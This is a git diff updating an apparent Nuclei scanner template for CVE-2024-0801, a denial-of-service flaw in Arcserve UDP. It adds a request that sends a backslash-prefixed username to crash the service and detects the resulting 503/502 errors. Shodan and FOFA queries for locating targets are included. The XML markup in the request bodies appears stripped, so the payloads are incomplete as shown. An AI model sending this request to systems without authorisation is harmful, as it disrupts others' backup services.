diff --git a/http/cves/2024/CVE-2024-0801.yaml b/http/cves/2024/CVE-2024-0801.yaml
index 1356a7e2325..a49cf5026d0 100644
--- a/http/cves/2024/CVE-2024-0801.yaml
+++ b/http/cves/2024/CVE-2024-0801.yaml
@@ -17,13 +17,19 @@ info:
cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:*
metadata:
verified: true
- max-request: 1
+ max-request: 2
vendor: arcserve
product: udp
shodan-query: http.favicon.hash:1015186617
fofa-query: icon_hash="1015186617"
tags: cve,cve2024,arcserve,dos,intrusive,vkev
+flow: http(1) && http(2)
+
+variables:
+ user: "{{to_lower(rand_base(6))}}"
+ pass: "{{to_lower(rand_base(6))}}"
+
http:
- raw:
- |
@@ -31,17 +37,28 @@ http:
Host: {{Hostname}}
Content-Type: text/xml
- \passworddomain
+ {{user}}{{pass}}domain
- matchers-condition: and
matchers:
- - type: status
- status:
- - 503
- - 502
+ - type: dsl
+ dsl:
+ - 'status_code == 500'
+ - 'contains(content_type, "text/xml")'
+ - 'contains(body, "Invalid user credentials")'
+ condition: and
+ internal: true
- - type: word
- part: body
- words:
- - "Service Unavailable
"
- - "Proxy Error
"
+ - raw:
+ - |
+ POST /management/services/EdgeServiceConsoleImpl HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: text/xml
+
+ \{{pass}}domain
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 503 && contains(body, "Service Unavailable
")'
+ - 'status_code == 502 && contains(body, "Proxy Error
")'
+ condition: or